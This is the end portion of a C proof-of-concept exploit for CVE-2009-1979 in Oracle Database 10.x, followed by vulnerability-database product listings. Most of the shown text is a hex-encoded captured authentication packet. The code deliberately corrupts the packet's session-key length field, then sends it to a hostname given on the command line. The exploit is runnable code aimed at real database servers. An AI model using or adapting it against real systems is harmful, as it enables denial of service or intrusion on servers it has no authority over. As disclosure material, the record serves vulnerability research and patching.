      "\x41\x43\x48\x49\x4E\x45\x0F\x00\x00\x00\x0F\x57\x4F\x52\x4B\x47"
      "\x52\x4F\x55\x50\x5C\x55\x4E\x49\x54\x31\x00\x00\x00\x00\x08\x00"
      "\x00\x00\x08\x41\x55\x54\x48\x5F\x50\x49\x44\x09\x00\x00\x00\x09"
      "\x32\x38\x30\x38\x3A\x34\x30\x30\x34\x00\x00\x00\x00\x08\x00\x00"
      "\x00\x08\x41\x55\x54\x48\x5F\x53\x49\x44\x06\x00\x00\x00\x06\x64"
      "\x65\x6E\x6E\x69\x73\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
      "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x43\x48\x41"
      "\x52\x53\x45\x54\x03\x00\x00\x00\x03\x31\x37\x38\x00\x00\x00\x00"
      "\x17\x00\x00\x00\x17\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49"
      "\x45\x4E\x54\x5F\x4C\x49\x42\x5F\x54\x59\x50\x45\x01\x00\x00\x00"
      "\x01\x31\x00\x00\x00\x00\x1A\x00\x00\x00\x1A\x53\x45\x53\x53\x49"
      "\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x44\x52\x49\x56\x45\x52"
      "\x5F\x4E\x41\x4D\x45\x0E\x00\x00\x00\x0E\x63\x78\x5F\x4F\x72\x61"
      "\x63\x6C\x65\x2D\x34\x2E\x34\x20\x00\x00\x00\x00\x16\x00\x00\x00"
      "\x16\x53\x45\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F"
      "\x56\x45\x52\x53\x49\x4F\x4E\x09\x00\x00\x00\x09\x31\x38\x35\x35"
      "\x39\x39\x34\x38\x38\x00\x00\x00\x00\x16\x00\x00\x00\x16\x53\x45"
      "\x53\x53\x49\x4F\x4E\x5F\x43\x4C\x49\x45\x4E\x54\x5F\x4C\x4F\x42"
      "\x41\x54\x54\x52\x01\x00\x00\x00\x01\x31\x00\x00\x00\x00\x08\x00"
      "\x00\x00\x08\x41\x55\x54\x48\x5F\x41\x43\x4C\x04\x00\x00\x00\x04"
      "\x34\x34\x30\x30\x00\x00\x00\x00\x12\x00\x00\x00\x12\x41\x55\x54"
      "\x48\x5F\x41\x4C\x54\x45\x52\x5F\x53\x45\x53\x53\x49\x4F\x4E\xE9"
      "\x01\x00\x00\xFE\xFF\x41\x4C\x54\x45\x52\x20\x53\x45\x53\x53\x49"
      "\x4F\x4E\x20\x53\x45\x54\x20\x4E\x4C\x53\x5F\x4C\x41\x4E\x47\x55"
      "\x41\x47\x45\x3D\x20\x27\x41\x4D\x45\x52\x49\x43\x41\x4E\x27\x20"
      "\x4E\x4C\x53\x5F\x54\x45\x52\x52\x49\x54\x4F\x52\x59\x3D\x20\x27"
      "\x41\x4D\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x43\x55\x52"
      "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x49"
      "\x53\x4F\x5F\x43\x55\x52\x52\x45\x4E\x43\x59\x3D\x20\x27\x41\x4D"
      "\x45\x52\x49\x43\x41\x27\x20\x4E\x4C\x53\x5F\x4E\x55\x4D\x45\x52"
      "\x49\x43\x5F\x43\x48\x41\x52\x41\x43\x54\x45\x52\x53\x3D\x20\x27"
      "\x2E\x2C\x27\x20\x4E\x4C\x53\x5F\x43\x41\x4C\x45\x4E\x44\x41\x52"
      "\x3D\x20\x27\x47\x52\x45\x47\x4F\x52\x49\x41\x4E\x27\x20\x4E\x4C"
      "\x53\x5F\x44\x41\x54\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27"
      "\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x27\x20\x4E\x4C\x53\x5F\x44"
      "\x41\x54\x45\x5F\x4C\x41\x4E\x47\x55\x41\x47\x45\x3D\x20\x27\x41"
      "\x4D\x45\x52\x49\x43\x41\x4E\x27\x20\x4E\x4C\x53\x5F\x53\x4F\x52"
      "\x54\x3D\x20\x27\x42\x49\x4E\x41\x52\x59\x27\x20\x54\x49\x4D\x45"
      "\x5F\x5A\x4F\x4E\xEA\x45\x3D\x20\x27\x2B\x30\x33\x3A\x30\x30\x27"
      "\x20\x4E\x4C\x53\x5F\x43\x4F\x4D\x50\x3D\x20\x27\x42\x49\x4E\x41"
      "\x52\x59\x27\x20\x4E\x4C\x53\x5F\x44\x55\x41\x4C\x5F\x43\x55\x52"
      "\x52\x45\x4E\x43\x59\x3D\x20\x27\x24\x27\x20\x4E\x4C\x53\x5F\x54"
      "\x49\x4D\x45\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20\x27\x48\x48\x2E"
      "\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C\x53"
      "\x5F\x54\x49\x4D\x45\x53\x54\x41\x4D\x50\x5F\x46\x4F\x52\x4D\x41"
      "\x54\x3D\x20\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48"
      "\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x27\x20\x4E\x4C"
      "\x53\x5F\x54\x49\x4D\x45\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54"
      "\x3D\x20\x27\x48\x48\x2E\x4D\x49\x2E\x53\x53\x58\x46\x46\x20\x41"
      "\x4D\x20\x54\x5A\x52\x27\x20\x4E\x4C\x53\x5F\x54\x49\x4D\x45\x53"
      "\x54\x41\x4D\x50\x5F\x54\x5A\x5F\x46\x4F\x52\x4D\x41\x54\x3D\x20"
      "\x27\x44\x44\x2D\x4D\x4F\x4E\x2D\x52\x52\x20\x48\x48\x2E\x4D\x49"
      "\x2E\x53\x53\x58\x46\x46\x20\x41\x4D\x20\x54\x5A\x52\x27\x00\x00"
      "\x00\x00\x00\x00\x17\x00\x00\x00\x17\x41\x55\x54\x48\x5F\x4C\x4F"
      "\x47\x49\x43\x41\x4C\x5F\x53\x45\x53\x53\x49\x4F\x4E\x5F\x49\x44"
      "\x20\x00\x00\x00\x20\x35\x44\x46\x34\x37\x43\x45\x35\x42\x38\x42"
      "\x32\x34\x43\x46\x38\x42\x46\x42\x36\x46\x30\x46\x36\x39\x32\x42"
      "\x38\x46\x42\x39\x38\x00\x00\x00\x00\x10\x00\x00\x00\x10\x41\x55"
      "\x54\x48\x5F\x46\x41\x49\x4C\x4F\x56\x45\x52\x5F\x49\x44\x00\x00"
      "\x00\x00\x00\x00\x00\x00"
      ,1318);
    // The single modification to the captured packet: offset 0x41 is the
    // second byte of the little-endian 32-bit AUTH_SESSKEY value length at
    // 0x40..0x43, so the declared length no longer matches the 0x40 bytes
    // that actually follow it.
    pkt1318[0x41]=0x80;
    s_send (s, pkt1318, 1318);
    // closed without reading any reply; closesocket() runs inside assert()
    assert (closesocket (s)==0);
    return true;
  }
  else
  {
    printf ("while connect(): select() returns zero\n");
    assert (closesocket (s)==0);
    return false;
  };
};
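// Entry point: print the banner, require one hostname argument and run
// try_host() against it. Exit status is 0 when try_host() returned true
// (final packet sent) and 1 on a usage error or a connect timeout.
// Change vs. original: `void main` with no status became `int main`, and
// the argument check looks at argc rather than relying on argv[1] being
// NULL when absent (argv[argc] is NULL, so both forms agree).
int main(int argc, char * argv[])
{
  printf ("CVE-2009-1979 PoC. Working at least on 10.2.0.4 win32\n");
  printf ("Vulnerability discovered by Dennis Yurichev <dennis@conus.info> http://blogs.conus.info\n");
  if (argc<2 || argv[1]==NULL)
  {
    printf ("use: %s <hostname>\n", argv[0]);
    return 1;
  }
  return try_host (argv[1]) ? 0 : 1;
}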
Products Mentioned
Configuration 0
Oracle>>Database_server >> Version 10.1.0.5
Oracle>>Database_server >> Version 10.2.0.4
Références